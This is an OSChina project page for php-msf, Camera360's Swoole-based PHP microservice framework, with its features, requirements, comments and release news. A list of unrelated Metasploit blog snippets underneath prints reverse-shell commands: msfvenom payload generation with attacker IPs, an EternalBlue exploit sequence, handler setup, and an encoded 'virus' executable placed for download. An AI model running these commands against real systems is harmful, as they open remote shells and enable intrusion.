php-msf 正在参加 2020 年度 OSC 中国开源项目评选,请投票支持!
php-msf 在 2020 年度 OSC 中国开源项目评选 中已获得 {{ projectVoteCount }} 票,请投票支持!
投票让它出道
已投票
php-msf 获得 2020 年度 OSC 中国开源项目评选「最佳人气项目」 !
php-msf 获得 2020 年度 OSC 中国开源项目评选「最佳人气项目」「最积极运营项目」 !
php-msf 获得 2020 年度 OSC 中国开源项目评选「最积极运营项目」 !
授权协议 GPLv2
开发语言 PHP 查看源码 »
操作系统 跨平台
软件类型 开源软件
所属分类 程序开发微服务框架
开源组织
地区 国产
投 递 者 局长
适用人群 未知
收录时间 2017-09-07

软件简介

PHP微服务框架即“Micro Service Framework For PHP”,是Camera360社区服务器端团队基于Swoole自主研发现代化的PHP协程服务框架,简称msf或者php-msf,是Swoole的工程级企业应用框架,经受了Camera360自拍相机亿级用户高并发大流量的考验。

php-msf由Camera360服务器团队主导研发,会持续更新与维护,也希望有更多优秀的Swoole应用实践开发者加入。php-msf核心设计思想是采用协程、异步、并行的创新技术手段提高系统的单机吞吐能力,降低整体服务器成本。

主要特性

  • 精简版的MVC框架

  • IO密集性业务的单机处理能力提升5-10倍

  • 代码常驻内存

  • 支持对象池

  • 支持Redis连接池、MySQL连接池

  • 支持Redis分布式、master-slave部署结构的集群

  • 支持异步、并行

  • 基于PHP Yield实现协程

  • 内建http/redis/mysql/mongodb/task等协程客户端

  • 纯异步的Http Server

  • RPC Server/Client

  • 支持命令行模式

  • 支持独立进程的定时器

  • 支持独立配置进程

环境要求

  • Linux,FreeBSD,MacOS(有兼容问题)

  • Linux内核版本2.3.32以上(支持epoll)

  • PHP-7.0及以上版本(生产环境建议使用PHP-7.1)

  • gcc-4.4以上版本

  • swoole-1.9.15及以上版本(暂不支持Swoole-2.0)

  • hiredis-0.13.3

  • yac

  • phpredis

  • composer

展开阅读全文

代码

的 Gitee 指数为
超过 的项目

评论 (5)

加载中
打分: 力荐
急速实验,尽快完善
2018/01/12 15:16
回复
举报
有计费方案是不是更好
2017/09/20 19:16
回复
举报
打分: 推荐
是php的一次伟大实践
2017/09/20 14:14
回复
举报
打分: 力荐
厉害了
2017/09/20 14:11
回复
举报
战术马
2017/09/07 22:37
回复
举报
更多评论
发表了资讯
2017/11/02 21:59

PHP微服务框架 PHP-MSF 发布 3.0.4 版本

PHP-MSF企业级微服务框架3.0.4发布 PHP微服务框架即“Micro Service Framework For PHP”,是Camera360社区服务器端团队基于Swoole自主研发现代化的PHP协程服务框架,简称msf或者php-msf,是Swoole的工程级企业应用框架,经受了Camera360亿级用户高并发大流量的考验。php-msf由Camera360服务器团队主导研发,会持续更新与维护,也希望有更多优秀的Swoole应用实践开发者加入。php-msf核心设计思想是采用协程、异步、并行的创新技...

8
44
发表了资讯
2017/09/19 16:15

企业级微服务框架 PHP-MSF 发布 3.0.2 版本

PHP-MSF企业级微服务框架3.0.2发布 PHP微服务框架即“Micro Service Framework For PHP”,是Camera360社区服务器端团队基于Swoole自主研发现代化的PHP协程服务框架,简称msf或者php-msf,是Swoole的工程级企业应用框架,经受了Camera360亿级用户高并发大流量的考验。php-msf由Camera360服务器团队主导研发,会持续更新与维护,也希望有更多优秀的Swoole应用实践开发者加入。php-msf核心设计思想是采用协程、异步、并行的创新技...

24
43
发表了资讯
2017/09/07 17:19

Camera360 开源基于 Swoole 的协程企业级微服务框架

今日Camera360正式开源其PHP微服务框架——Micro Service Framework For PHP,这是Camera360社区服务器端团队基于Swoole自主研发现代化的PHP协程服务框架,简称msf或者php-msf,是Swoole的工程级企业应用框架,经受了Camera360自拍相机亿级用户高并发大流量的考验。 php-msf由Camera360服务器团队主导研发,会持续更新与维护,也希望有更多优秀的Swoole应用实践开发者加入。php-msf核心设计思想是采用协程、异步、并行的创新技术...

11
74
没有更多内容
加载失败,请刷新页面
点击加载更多
加载中
下一页
发表了博客
2019/10/23 00:25

php微服务框架 PHP-MSF 的容器部署和使用

一、需求 PHP-msf 是 Carema360 开发的 PHP 微服务框架,目前我没有实际用过,但是市面上的微服务框架要么在推崇 Spring 系,要么是 go/node,由于想用 PHP 搞微服务,就顺便搜了下 PHP 的微服务框架,发现了 php-msf。 php-msf 的文档少得可怜,就是简单的介绍了一下。不过如果熟悉 MVC 的 PHP 开发框架的话,只要熟练一下 API 就可以了,其他倒没什么。 作为微服务框架,与 Docker 一定是有联系的, 而我觉得 php-msf 在这方面...

0
0
发表了博客
2018/01/15 10:32

msf-show

Metasploit框架中包涵数百个模块,没有人能用脑子把它们的名字全部记下来。在MSF终端中运行show命令会把所有的模块显示出来,也可以指定模块的类型来缩小搜索范围。 1. msf > show exploits Exploits ======== Name Disclosure Date Rank Description ---- --------------- ---- ...

0
0
发表了博客
2012/11/26 11:10

msf

msf 里 use 了一个 exploite 怎么返回呢 使用命令 back

0
0
发表了博客
2019/03/20 22:50

MSF

root@Debian:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.235 LPORT=6666 -f exe X > /root/0.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 341 bytes Final size of exe file: 73802 bytes root@Debian:~#...

0
0
发表了博客
2019/01/08 18:09

生成常用的msf

生成msf常用payload msf作为一款强大的漏洞检测工具,如何生成适用于msf的payload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。 在kali下可以使用如下命令列出MSFVenom可以生成的payload列表: msfvenom -l 生成二进制文件 关于二进制文件,主要介绍适用于Windows、linux、mac操作系统的payload生成与利用。 Windows msfvenom -p wind...

0
0
发表了博客
2019/05/15 16:02

msf反弹shell

今天回顾了一下msf反弹shell的操作,在这里做一下记录和分享。( ̄︶ ̄)↗ 反弹shell的两种方法 第一种Msfvenom实例: 1、msfconsole    #启动msf 2、msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php    #生成反弹shell文件 LHOST表示本地攻击机的ip, LPORT表示本地攻击机的端口。 其他msf下的各种生成payload命令可参考:https://www.cnblogs.c...

0
0
发表了博客
2019/07/10 16:24

工具 - MSF

1 #ms17-010 2 use auxiliary/scanner/smb/smb_ms17_010 3 set rhosts 10.31.0-128.1-254 4 set threads 512 5 exploit 6 7 use exploit/windows/smb/ms17_010_eternalblue 8 set rhost 10.31.36.66 9 set payload windows/x64/meterpreter/reverse_tcp 10 set lhost 10.31.30.49 11 set lport 4567 12 exploit 13 14 screenshot 信息收集 auxiliary/scanner/discovery/arp_sweep auxiliary/scancer/smb/smb_version ...

0
0
发表于运维专区
2019/04/25 08:00

MSF后渗透利用整理|MSF命令大全三

八、 路由设置 实验机: MSF攻击机:202.192.29.17 跳板机:202.192.29.45 内网目标机:192.168.118.129 这里从我们已经拿下了跳板机开始,我们直接使用msfvenom传给跳板机点击,生成一个session: 设置好msf配置信息: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp show options set LHOST 202.192.29.17 set LPORT 4444 run 获取到shell后如果出现乱码,使用chcp命令: 1.route 查询内网本地路由查...

0
0
发表了博客
2019/03/22 20:51

msf help.

root@Debian:~# msfconsole [-] ***rtiNg the Metasploit Framework console...- [-] * WARNING: No database support: could not connect to server: Connection refused Is the server running on host "localhost" (::1) and accepting TCP/IP connections on port 5432? could not connect to server: Connection refused Is the server running on host "localhost" (127.0.0.1) and accepting TCP/IP connections on port...

0
0
发表了博客
2020/10/11 12:26

msf病毒制作

root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.16.190 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -i 20 | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f exe -o /var/www/html/windows.exe** 生成病毒 ,命名为windows.exe 编辑好的病毒存放在/var/www/html/ 下载好,移动到win7, 回到msf中,切换到 explpit/multi/handler/模块中 在模块中选择 ...

0
0
没有更多内容
加载失败,请刷新页面
点击加载更多
加载中
下一页
暂无内容
5 评论
105 收藏
分享
OSCHINA
登录后可查看更多优质内容
返回顶部
顶部